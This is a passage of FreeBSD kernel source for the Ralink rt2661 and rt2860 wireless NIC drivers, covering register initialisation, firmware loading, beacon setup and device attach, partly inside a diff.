R%d=%02x\n", sc->bbp_prom[i].reg, sc->bbp_prom[i].val); } } static int rt2661_bbp_init(struct rt2661_softc *sc) { #define N(a) (sizeof (a) / sizeof ((a)[0])) int i, ntries; uint8_t val; /* wait for BBP to be ready */ for (ntries = 0; ntries < 100; ntries++) { val = rt2661_bbp_read(sc, 0); if (val != 0 && val != 0xff) break; DELAY(100); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for BBP\n"); return EIO; } /* initialize BBP registers to default values */ for (i = 0; i < N(rt2661_def_bbp); i++) { 
rt2661_bbp_write(sc, rt2661_def_bbp[i].reg, rt2661_def_bbp[i].val); } /* write vendor-specific BBP values (from EEPROM) */ for (i = 0; i < 16; i++) { if (sc->bbp_prom[i].reg == 0) continue; rt2661_bbp_write(sc, sc->bbp_prom[i].reg, sc->bbp_prom[i].val); } return 0; #undef N } static void rt2661_init_locked(struct rt2661_softc *sc) { #define N(a) (sizeof (a) / sizeof ((a)[0])) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp, sta[3]; int i, error, ntries; RAL_LOCK_ASSERT(sc); if ((sc->sc_flags & RAL_FW_LOADED) == 0) { error = rt2661_load_microcode(sc); if (error != 0) { if_printf(ifp, "%s: could not load 8051 microcode, error %d\n", __func__, error); return; } sc->sc_flags |= RAL_FW_LOADED; } rt2661_stop_locked(sc); /* initialize Tx rings */ RAL_WRITE(sc, RT2661_AC1_BASE_CSR, sc->txq[1].physaddr); RAL_WRITE(sc, RT2661_AC0_BASE_CSR, sc->txq[0].physaddr); RAL_WRITE(sc, RT2661_AC2_BASE_CSR, sc->txq[2].physaddr); RAL_WRITE(sc, RT2661_AC3_BASE_CSR, sc->txq[3].physaddr); /* initialize Mgt ring */ RAL_WRITE(sc, RT2661_MGT_BASE_CSR, sc->mgtq.physaddr); /* initialize Rx ring */ RAL_WRITE(sc, RT2661_RX_BASE_CSR, sc->rxq.physaddr); /* initialize Tx rings sizes */ RAL_WRITE(sc, RT2661_TX_RING_CSR0, RT2661_TX_RING_COUNT << 24 | RT2661_TX_RING_COUNT << 16 | RT2661_TX_RING_COUNT << 8 | RT2661_TX_RING_COUNT); RAL_WRITE(sc, RT2661_TX_RING_CSR1, RT2661_TX_DESC_WSIZE << 16 | RT2661_TX_RING_COUNT << 8 | /* XXX: HCCA ring unused */ RT2661_MGT_RING_COUNT); /* initialize Rx rings */ RAL_WRITE(sc, RT2661_RX_RING_CSR, RT2661_RX_DESC_BACK << 16 | RT2661_RX_DESC_WSIZE << 8 | RT2661_RX_RING_COUNT); /* XXX: some magic here */ RAL_WRITE(sc, RT2661_TX_DMA_DST_CSR, 0xaa); /* load base addresses of all 5 Tx rings (4 data + 1 mgt) */ RAL_WRITE(sc, RT2661_LOAD_TX_RING_CSR, 0x1f); /* load base address of Rx ring */ RAL_WRITE(sc, RT2661_RX_CNTL_CSR, 2); /* initialize MAC registers to default values */ for (i = 0; i < N(rt2661_def_mac); i++) RAL_WRITE(sc, rt2661_def_mac[i].reg, rt2661_def_mac[i].val); rt2661_set_macaddr(sc, IF_LLADDR(ifp)); /* set host ready */ RAL_WRITE(sc, RT2661_MAC_CSR1, 3); RAL_WRITE(sc, RT2661_MAC_CSR1, 0); /* wait for BBP/RF to wakeup */ for (ntries = 0; ntries < 1000; ntries++) { if (RAL_READ(sc, RT2661_MAC_CSR12) & 8) break; DELAY(1000); } if (ntries == 1000) { printf("timeout waiting for BBP/RF to wakeup\n"); rt2661_stop_locked(sc); return; } if (rt2661_bbp_init(sc) != 0) { rt2661_stop_locked(sc); return; } /* select default channel */ sc->sc_curchan = ic->ic_curchan; rt2661_select_band(sc, sc->sc_curchan); rt2661_select_antenna(sc); rt2661_set_chan(sc, sc->sc_curchan); /* update Rx filter */ tmp = RAL_READ(sc, RT2661_TXRX_CSR0) & 0xffff; tmp |= RT2661_DROP_PHY_ERROR | RT2661_DROP_CRC_ERROR; if (ic->ic_opmode != IEEE80211_M_MONITOR) { tmp |= RT2661_DROP_CTL | RT2661_DROP_VER_ERROR | RT2661_DROP_ACKCTS; if (ic->ic_opmode != IEEE80211_M_HOSTAP && ic->ic_opmode != IEEE80211_M_MBSS) tmp |= RT2661_DROP_TODS; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RT2661_DROP_NOT_TO_ME; } RAL_WRITE(sc, RT2661_TXRX_CSR0, tmp); /* clear STA registers */ RAL_READ_REGION_4(sc, RT2661_STA_CSR0, sta, N(sta)); /* initialize ASIC */ RAL_WRITE(sc, RT2661_MAC_CSR1, 4); /* clear any pending interrupt */ RAL_WRITE(sc, RT2661_INT_SOURCE_CSR, 0xffffffff); /* enable interrupts */ RAL_WRITE(sc, RT2661_INT_MASK_CSR, 0x0000ff10); RAL_WRITE(sc, RT2661_MCU_INT_MASK_CSR, 0); /* kick Rx */ RAL_WRITE(sc, RT2661_RX_CNTL_CSR, 1); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; 
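/* interface is now marked running; (re)arm the 1 second (hz tick) watchdog that drives rt2661_watchdog() */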
callout_reset(&sc->watchdog_ch, hz, rt2661_watchdog, sc); #undef N } static void rt2661_init(void *priv) { struct rt2661_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; RAL_LOCK(sc); rt2661_init_locked(sc); RAL_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } void rt2661_stop_locked(struct rt2661_softc *sc) { struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; volatile int *flags = &sc->sc_flags; while (*flags & RAL_INPUT_RUNNING) msleep(sc, &sc->sc_mtx, 0, "ralrunning", hz/10); callout_stop(&sc->watchdog_ch); sc->sc_tx_timer = 0; if (ifp->if_drv_flags & IFF_DRV_RUNNING) { ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); /* abort Tx (for all 5 Tx rings) */ RAL_WRITE(sc, RT2661_TX_CNTL_CSR, 0x1f << 16); /* disable Rx (value remains after reset!) */ tmp = RAL_READ(sc, RT2661_TXRX_CSR0); RAL_WRITE(sc, RT2661_TXRX_CSR0, tmp | RT2661_DISABLE_RX); /* reset ASIC */ RAL_WRITE(sc, RT2661_MAC_CSR1, 3); RAL_WRITE(sc, RT2661_MAC_CSR1, 0); /* disable interrupts */ RAL_WRITE(sc, RT2661_INT_MASK_CSR, 0xffffffff); RAL_WRITE(sc, RT2661_MCU_INT_MASK_CSR, 0xffffffff); /* clear any pending interrupt */ RAL_WRITE(sc, RT2661_INT_SOURCE_CSR, 0xffffffff); RAL_WRITE(sc, RT2661_MCU_INT_SOURCE_CSR, 0xffffffff); /* reset Tx and Rx rings */ rt2661_reset_tx_ring(sc, &sc->txq[0]); rt2661_reset_tx_ring(sc, &sc->txq[1]); rt2661_reset_tx_ring(sc, &sc->txq[2]); rt2661_reset_tx_ring(sc, &sc->txq[3]); rt2661_reset_tx_ring(sc, &sc->mgtq); rt2661_reset_rx_ring(sc, &sc->rxq); } } void rt2661_stop(void *priv) { struct rt2661_softc *sc = priv; RAL_LOCK(sc); rt2661_stop_locked(sc); RAL_UNLOCK(sc); } static int rt2661_load_microcode(struct rt2661_softc *sc) { struct ifnet *ifp = sc->sc_ifp; const struct firmware *fp; const char *imagename; int ntries, error; RAL_LOCK_ASSERT(sc); switch (sc->sc_id) { case 0x0301: imagename = "rt2561sfw"; break; case 0x0302: imagename = "rt2561fw"; break; case 0x0401: imagename = "rt2661fw"; break; default: if_printf(ifp, "%s: unexpected pci device id 0x%x, " "don't know how to retrieve firmware\n", __func__, sc->sc_id); return EINVAL; } RAL_UNLOCK(sc); fp = firmware_get(imagename); RAL_LOCK(sc); if (fp == NULL) { if_printf(ifp, "%s: unable to retrieve firmware image %s\n", __func__, imagename); return EINVAL; } /* * Load 8051 microcode into NIC. */ /* reset 8051 */ RAL_WRITE(sc, RT2661_MCU_CNTL_CSR, RT2661_MCU_RESET); /* cancel any pending Host to MCU command */ RAL_WRITE(sc, RT2661_H2M_MAILBOX_CSR, 0); RAL_WRITE(sc, RT2661_M2H_CMD_DONE_CSR, 0xffffffff); RAL_WRITE(sc, RT2661_HOST_CMD_CSR, 0); /* write 8051's microcode */ RAL_WRITE(sc, RT2661_MCU_CNTL_CSR, RT2661_MCU_RESET | RT2661_MCU_SEL); RAL_WRITE_REGION_1(sc, RT2661_MCU_CODE_BASE, fp->data, fp->datasize); RAL_WRITE(sc, RT2661_MCU_CNTL_CSR, RT2661_MCU_RESET); /* kick 8051's ass */ RAL_WRITE(sc, RT2661_MCU_CNTL_CSR, 0); /* wait for 8051 to initialize */ for (ntries = 0; ntries < 500; ntries++) { if (RAL_READ(sc, RT2661_MCU_CNTL_CSR) & RT2661_MCU_READY) break; DELAY(100); } if (ntries == 500) { if_printf(ifp, "%s: timeout waiting for MCU to initialize\n", __func__); error = EIO; } else error = 0; firmware_put(fp, FIRMWARE_UNLOAD); return error; } #ifdef notyet /* * Dynamically tune Rx sensitivity (BBP register 17) based on average RSSI and * false CCA count. This function is called periodically (every seconds) when * in the RUN state. Values taken from the reference driver. 
*/ static void rt2661_rx_tune(struct rt2661_softc *sc) { uint8_t bbp17; uint16_t cca; int lo, hi, dbm; /* * Tuning range depends on operating band and on the presence of an * external low-noise amplifier. */ lo = 0x20; if (IEEE80211_IS_CHAN_5GHZ(sc->sc_curchan)) lo += 0x08; if ((IEEE80211_IS_CHAN_2GHZ(sc->sc_curchan) && sc->ext_2ghz_lna) || (IEEE80211_IS_CHAN_5GHZ(sc->sc_curchan) && sc->ext_5ghz_lna)) lo += 0x10; hi = lo + 0x20; /* retrieve false CCA count since last call (clear on read) */ cca = RAL_READ(sc, RT2661_STA_CSR1) & 0xffff; if (dbm >= -35) { bbp17 = 0x60; } else if (dbm >= -58) { bbp17 = hi; } else if (dbm >= -66) { bbp17 = lo + 0x10; } else if (dbm >= -74) { bbp17 = lo + 0x08; } else { /* RSSI < -74dBm, tune using false CCA count */ bbp17 = sc->bbp17; /* current value */ hi -= 2 * (-74 - dbm); if (hi < lo) hi = lo; if (bbp17 > hi) { bbp17 = hi; } else if (cca > 512) { if (++bbp17 > hi) bbp17 = hi; } else if (cca < 100) { if (--bbp17 < lo) bbp17 = lo; } } if (bbp17 != sc->bbp17) { rt2661_bbp_write(sc, 17, bbp17); sc->bbp17 = bbp17; } } /* * Enter/Leave radar detection mode. * This is for 802.11h additional regulatory domains. */ static void rt2661_radar_start(struct rt2661_softc *sc) { uint32_t tmp; /* disable Rx */ tmp = RAL_READ(sc, RT2661_TXRX_CSR0); RAL_WRITE(sc, RT2661_TXRX_CSR0, tmp | RT2661_DISABLE_RX); rt2661_bbp_write(sc, 82, 0x20); rt2661_bbp_write(sc, 83, 0x00); rt2661_bbp_write(sc, 84, 0x40); /* save current BBP registers values */ sc->bbp18 = rt2661_bbp_read(sc, 18); sc->bbp21 = rt2661_bbp_read(sc, 21); sc->bbp22 = rt2661_bbp_read(sc, 22); sc->bbp16 = rt2661_bbp_read(sc, 16); sc->bbp17 = rt2661_bbp_read(sc, 17); sc->bbp64 = rt2661_bbp_read(sc, 64); rt2661_bbp_write(sc, 18, 0xff); rt2661_bbp_write(sc, 21, 0x3f); rt2661_bbp_write(sc, 22, 0x3f); rt2661_bbp_write(sc, 16, 0xbd); rt2661_bbp_write(sc, 17, sc->ext_5ghz_lna ? 0x44 : 0x34); rt2661_bbp_write(sc, 64, 0x21); /* restore Rx filter */ RAL_WRITE(sc, RT2661_TXRX_CSR0, tmp); } static int rt2661_radar_stop(struct rt2661_softc *sc) { uint8_t bbp66; /* read radar detection result */ bbp66 = rt2661_bbp_read(sc, 66); /* restore BBP registers values */ rt2661_bbp_write(sc, 16, sc->bbp16); rt2661_bbp_write(sc, 17, sc->bbp17); rt2661_bbp_write(sc, 18, sc->bbp18); rt2661_bbp_write(sc, 21, sc->bbp21); rt2661_bbp_write(sc, 22, sc->bbp22); rt2661_bbp_write(sc, 64, sc->bbp64); return bbp66 == 1; } #endif static int rt2661_prepare_beacon(struct rt2661_softc *sc, struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_beacon_offsets bo; struct rt2661_tx_desc desc; struct mbuf *m0; int rate; m0 = ieee80211_beacon_alloc(vap->iv_bss, &bo); if (m0 == NULL) { device_printf(sc->sc_dev, "could not allocate beacon frame\n"); return ENOBUFS; } /* send beacons at the lowest available rate */ rate = IEEE80211_IS_CHAN_5GHZ(ic->ic_bsschan) ? 12 : 2; rt2661_setup_tx_desc(sc, &desc, RT2661_TX_TIMESTAMP, RT2661_TX_HWSEQ, m0->m_pkthdr.len, rate, NULL, 0, RT2661_QID_MGT); /* copy the first 24 bytes of Tx descriptor into NIC memory */ RAL_WRITE_REGION_1(sc, RT2661_HW_BEACON_BASE0, (uint8_t *)&desc, 24); /* copy beacon header and payload into NIC memory */ RAL_WRITE_REGION_1(sc, RT2661_HW_BEACON_BASE0 + 24, mtod(m0, uint8_t *), m0->m_pkthdr.len); m_freem(m0); return 0; } /* * Enable TSF synchronization and tell h/w to start sending beacons for IBSS * and HostAP operating modes. 
*/ static void rt2661_enable_tsf_sync(struct rt2661_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); uint32_t tmp; if (vap->iv_opmode != IEEE80211_M_STA) { /* * Change default 16ms TBTT adjustment to 8ms. * Must be done before enabling beacon generation. */ RAL_WRITE(sc, RT2661_TXRX_CSR10, 1 << 12 | 8); } tmp = RAL_READ(sc, RT2661_TXRX_CSR9) & 0xff000000; /* set beacon interval (in 1/16ms unit) */ tmp |= vap->iv_bss->ni_intval * 16; tmp |= RT2661_TSF_TICKING | RT2661_ENABLE_TBTT; if (vap->iv_opmode == IEEE80211_M_STA) tmp |= RT2661_TSF_MODE(1); else tmp |= RT2661_TSF_MODE(2) | RT2661_GENERATE_BEACON; RAL_WRITE(sc, RT2661_TXRX_CSR9, tmp); } static void rt2661_enable_tsf(struct rt2661_softc *sc) { RAL_WRITE(sc, RT2661_TXRX_CSR9, (RAL_READ(sc, RT2661_TXRX_CSR9) & 0xff000000) | RT2661_TSF_TICKING | RT2661_TSF_MODE(2)); } /* * Retrieve the "Received Signal Strength Indicator" from the raw values * contained in Rx descriptors. The computation depends on which band the * frame was received. Correction values taken from the reference driver. */ static int rt2661_get_rssi(struct rt2661_softc *sc, uint8_t raw) { int lna, agc, rssi; lna = (raw >> 5) & 0x3; agc = raw & 0x1f; if (lna == 0) { /* * No mapping available. * * NB: Since RSSI is relative to noise floor, -1 is * adequate for caller to know error happened. */ return -1; } rssi = (2 * agc) - RT2661_NOISE_FLOOR; if (IEEE80211_IS_CHAN_2GHZ(sc->sc_curchan)) { rssi += sc->rssi_2ghz_corr; if (lna == 1) rssi -= 64; else if (lna == 2) rssi -= 74; else if (lna == 3) rssi -= 90; } else { rssi += sc->rssi_5ghz_corr; if (lna == 1) rssi -= 64; else if (lna == 2) rssi -= 86; else if (lna == 3) rssi -= 100; } return rssi; } static void rt2661_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2661_softc *sc = ifp->if_softc; uint32_t tmp; /* abort TSF synchronization */ tmp = RAL_READ(sc, RT2661_TXRX_CSR9); RAL_WRITE(sc, RT2661_TXRX_CSR9, tmp & ~0xffffff); rt2661_set_bssid(sc, ifp->if_broadcastaddr); } static void rt2661_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2661_softc *sc = ifp->if_softc; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); rt2661_enable_tsf_sync(sc); /* XXX keep local copy */ rt2661_set_bssid(sc, vap->iv_bss->ni_bssid); } static void rt2661_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2661_softc *sc = ifp->if_softc; RAL_LOCK(sc); rt2661_set_chan(sc, ic->ic_curchan); RAL_UNLOCK(sc); } diff --git a/sys/dev/ral/rt2860.c b/sys/dev/ral/rt2860.c index 300ffc8d9404..e37f820d27f3 100644 --- a/sys/dev/ral/rt2860.c +++ b/sys/dev/ral/rt2860.c @@ -1,4105 +1,4105 @@ /*- * Copyright (c) 2007-2010 Damien Bergamini * Copyright (c) 2012 Bernhard Schmidt * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 
* * $OpenBSD: rt2860.c,v 1.65 2010/10/23 14:24:54 damien Exp $ */ #include __FBSDID("$FreeBSD$"); /*- * Ralink Technology RT2860/RT3090/RT3390/RT3562 chipset driver * http://www.ralinktech.com/ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define RAL_DEBUG #ifdef RAL_DEBUG #define DPRINTF(x) do { if (sc->sc_debug > 0) printf x; } while (0) #define DPRINTFN(n, x) do { if (sc->sc_debug >= (n)) printf x; } while (0) #else #define DPRINTF(x) #define DPRINTFN(n, x) #endif static struct ieee80211vap *rt2860_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void rt2860_vap_delete(struct ieee80211vap *); static void rt2860_dma_map_addr(void *, bus_dma_segment_t *, int, int); static int rt2860_alloc_tx_ring(struct rt2860_softc *, struct rt2860_tx_ring *); static void rt2860_reset_tx_ring(struct rt2860_softc *, struct rt2860_tx_ring *); static void rt2860_free_tx_ring(struct rt2860_softc *, struct rt2860_tx_ring *); static int rt2860_alloc_tx_pool(struct rt2860_softc *); static void rt2860_free_tx_pool(struct rt2860_softc *); static int rt2860_alloc_rx_ring(struct rt2860_softc *, struct rt2860_rx_ring *); static void rt2860_reset_rx_ring(struct rt2860_softc *, struct rt2860_rx_ring *); static void rt2860_free_rx_ring(struct rt2860_softc *, struct rt2860_rx_ring *); static void rt2860_updatestats(struct rt2860_softc *); static void rt2860_newassoc(struct ieee80211_node *, int); static void rt2860_node_free(struct ieee80211_node *); #ifdef IEEE80211_HT static int rt2860_ampdu_rx_start(struct ieee80211com *, struct ieee80211_node *, uint8_t); static void rt2860_ampdu_rx_stop(struct ieee80211com *, struct ieee80211_node *, uint8_t); #endif static int rt2860_newstate(struct ieee80211vap *, enum ieee80211_state, int); static uint16_t rt3090_efuse_read_2(struct rt2860_softc *, uint16_t); static uint16_t rt2860_eeprom_read_2(struct rt2860_softc *, uint16_t); static void rt2860_intr_coherent(struct rt2860_softc *); static void rt2860_drain_stats_fifo(struct rt2860_softc *); static void rt2860_tx_intr(struct rt2860_softc *, int); static void rt2860_rx_intr(struct rt2860_softc *); static void rt2860_tbtt_intr(struct rt2860_softc *); static void rt2860_gp_intr(struct rt2860_softc *); static int rt2860_tx(struct rt2860_softc *, struct mbuf *, struct ieee80211_node *); static int rt2860_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static int rt2860_tx_raw(struct rt2860_softc *, struct mbuf *, struct ieee80211_node *, const struct ieee80211_bpf_params *params); static void rt2860_start(struct ifnet *); static void rt2860_start_locked(struct ifnet *); static void rt2860_watchdog(void *); static int rt2860_ioctl(struct ifnet *, u_long, caddr_t); static void rt2860_mcu_bbp_write(struct rt2860_softc *, uint8_t, uint8_t); static uint8_t rt2860_mcu_bbp_read(struct rt2860_softc *, uint8_t); static void rt2860_rf_write(struct rt2860_softc *, uint8_t, uint32_t); static uint8_t rt3090_rf_read(struct rt2860_softc *, uint8_t); static void rt3090_rf_write(struct rt2860_softc *, uint8_t, uint8_t); static int rt2860_mcu_cmd(struct rt2860_softc *, uint8_t, uint16_t, int); static void 
rt2860_enable_mrr(struct rt2860_softc *); static void rt2860_set_txpreamble(struct rt2860_softc *); static void rt2860_set_basicrates(struct rt2860_softc *, const struct ieee80211_rateset *); static void rt2860_scan_start(struct ieee80211com *); static void rt2860_scan_end(struct ieee80211com *); static void rt2860_set_channel(struct ieee80211com *); static void rt2860_select_chan_group(struct rt2860_softc *, int); static void rt2860_set_chan(struct rt2860_softc *, u_int); static void rt3090_set_chan(struct rt2860_softc *, u_int); static int rt3090_rf_init(struct rt2860_softc *); static void rt3090_rf_wakeup(struct rt2860_softc *); static int rt3090_filter_calib(struct rt2860_softc *, uint8_t, uint8_t, uint8_t *); static void rt3090_rf_setup(struct rt2860_softc *); static void rt2860_set_leds(struct rt2860_softc *, uint16_t); static void rt2860_set_gp_timer(struct rt2860_softc *, int); static void rt2860_set_bssid(struct rt2860_softc *, const uint8_t *); static void rt2860_set_macaddr(struct rt2860_softc *, const uint8_t *); static void rt2860_update_promisc(struct ifnet *); static void rt2860_updateslot(struct ifnet *); static void rt2860_updateprot(struct ifnet *); static int rt2860_updateedca(struct ieee80211com *); #ifdef HW_CRYPTO static int rt2860_set_key(struct ieee80211com *, struct ieee80211_node *, struct ieee80211_key *); static void rt2860_delete_key(struct ieee80211com *, struct ieee80211_node *, struct ieee80211_key *); #endif static int8_t rt2860_rssi2dbm(struct rt2860_softc *, uint8_t, uint8_t); static const char *rt2860_get_rf(uint8_t); static int rt2860_read_eeprom(struct rt2860_softc *, uint8_t macaddr[IEEE80211_ADDR_LEN]); static int rt2860_bbp_init(struct rt2860_softc *); static int rt2860_txrx_enable(struct rt2860_softc *); static void rt2860_init(void *); static void rt2860_init_locked(struct rt2860_softc *); static void rt2860_stop(void *); static void rt2860_stop_locked(struct rt2860_softc *); static int rt2860_load_microcode(struct rt2860_softc *); #ifdef NOT_YET static void rt2860_calib(struct rt2860_softc *); #endif static void rt3090_set_rx_antenna(struct rt2860_softc *, int); static void rt2860_switch_chan(struct rt2860_softc *, struct ieee80211_channel *); static int rt2860_setup_beacon(struct rt2860_softc *, struct ieee80211vap *); static void rt2860_enable_tsf_sync(struct rt2860_softc *); static const struct { uint32_t reg; uint32_t val; } rt2860_def_mac[] = { RT2860_DEF_MAC }; static const struct { uint8_t reg; uint8_t val; } rt2860_def_bbp[] = { RT2860_DEF_BBP }; static const struct rfprog { uint8_t chan; uint32_t r1, r2, r3, r4; } rt2860_rf2850[] = { RT2860_RF2850 }; struct { uint8_t n, r, k; } rt3090_freqs[] = { RT3070_RF3052 }; static const struct { uint8_t reg; uint8_t val; } rt3090_def_rf[] = { RT3070_DEF_RF }; int rt2860_attach(device_t dev, int id) { struct rt2860_softc *sc = device_get_softc(dev); struct ieee80211com *ic; struct ifnet *ifp; uint32_t tmp; int error, ntries, qid; uint8_t bands; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_dev = dev; sc->sc_debug = 0; ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); return ENOMEM; } ic = ifp->if_l2com; mtx_init(&sc->sc_mtx, device_get_nameunit(dev), MTX_NETWORK_LOCK, MTX_DEF | MTX_RECURSE); callout_init_mtx(&sc->watchdog_ch, &sc->sc_mtx, 0); /* wait for NIC to initialize */ for (ntries = 0; ntries < 100; ntries++) { tmp = RAL_READ(sc, RT2860_ASIC_VER_ID); if (tmp != 0 && tmp != 0xffffffff) break; DELAY(10); } if (ntries == 100) { 
device_printf(sc->sc_dev, "timeout waiting for NIC to initialize\n"); error = EIO; goto fail1; } sc->mac_ver = tmp >> 16; sc->mac_rev = tmp & 0xffff; if (sc->mac_ver != 0x2860 && (id == 0x0681 || id == 0x0781 || id == 0x1059)) sc->sc_flags |= RT2860_ADVANCED_PS; /* retrieve RF rev. no and various other things from EEPROM */ rt2860_read_eeprom(sc, macaddr); if (bootverbose) { device_printf(sc->sc_dev, "MAC/BBP RT%X (rev 0x%04X), " "RF %s (MIMO %dT%dR), address %6D\n", sc->mac_ver, sc->mac_rev, rt2860_get_rf(sc->rf_rev), sc->ntxchains, sc->nrxchains, macaddr, ":"); } /* * Allocate Tx (4 EDCAs + HCCA + Mgt) and Rx rings. */ for (qid = 0; qid < 6; qid++) { if ((error = rt2860_alloc_tx_ring(sc, &sc->txq[qid])) != 0) { device_printf(sc->sc_dev, "could not allocate Tx ring %d\n", qid); goto fail2; } } if ((error = rt2860_alloc_rx_ring(sc, &sc->rxq)) != 0) { device_printf(sc->sc_dev, "could not allocate Rx ring\n"); goto fail2; } if ((error = rt2860_alloc_tx_pool(sc)) != 0) { device_printf(sc->sc_dev, "could not allocate Tx pool\n"); goto fail3; } /* mgmt ring is broken on RT2860C, use EDCA AC VO ring instead */ sc->mgtqid = (sc->mac_ver == 0x2860 && sc->mac_rev == 0x0100) ? WME_AC_VO : 5; ifp->if_softc = sc; if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = rt2860_init; ifp->if_ioctl = rt2860_ioctl; ifp->if_start = rt2860_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_opmode = IEEE80211_M_STA; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode */ | IEEE80211_C_IBSS /* ibss, nee adhoc, mode */ | IEEE80211_C_HOSTAP /* hostap mode */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_AHDEMO /* adhoc demo mode */ | IEEE80211_C_WDS /* 4-address traffic works */ | IEEE80211_C_MBSS /* mesh point link mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_WPA /* capable of WPA1+WPA2 */ #if 0 | IEEE80211_C_BGSCAN /* capable of bg scanning */ #endif | IEEE80211_C_WME /* 802.11e */ ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if (sc->rf_rev == RT2860_RF_2750 || sc->rf_rev == RT2860_RF_2850) setbit(&bands, IEEE80211_MODE_11A); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, macaddr); ic->ic_wme.wme_update = rt2860_updateedca; ic->ic_scan_start = rt2860_scan_start; ic->ic_scan_end = rt2860_scan_end; ic->ic_set_channel = rt2860_set_channel; ic->ic_updateslot = rt2860_updateslot; ic->ic_update_promisc = rt2860_update_promisc; ic->ic_raw_xmit = rt2860_raw_xmit; sc->sc_node_free = ic->ic_node_free; ic->ic_node_free = rt2860_node_free; ic->ic_newassoc = rt2860_newassoc; ic->ic_vap_create = rt2860_vap_create; ic->ic_vap_delete = rt2860_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), RT2860_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), RT2860_RX_RADIOTAP_PRESENT); #ifdef RAL_DEBUG SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "debug", CTLFLAG_RW, &sc->sc_debug, 0, "debug msgs"); #endif if (bootverbose) ieee80211_announce(ic); return 0; fail3: rt2860_free_rx_ring(sc, &sc->rxq); fail2: while (--qid >= 0) rt2860_free_tx_ring(sc, &sc->txq[qid]); fail1: mtx_destroy(&sc->sc_mtx); if_free(ifp); return error; } 
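/*
 * Illustrative sketch, not part of the original driver: the attach path above
 * splits the 32-bit word read from RT2860_ASIC_VER_ID into a chip version
 * (high 16 bits, e.g. 0x2860) and a silicon revision (low 16 bits), which is
 * what sc->mac_ver and sc->mac_rev cache.  The helper below is hypothetical
 * and only documents that bit layout.
 */
static __inline void
rt2860_split_asic_ver(uint32_t ver_id, uint16_t *mac_ver, uint16_t *mac_rev)
{
	*mac_ver = ver_id >> 16;	/* chip version, e.g. 0x2860 or 0x3090 */
	*mac_rev = ver_id & 0xffff;	/* silicon revision */
}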
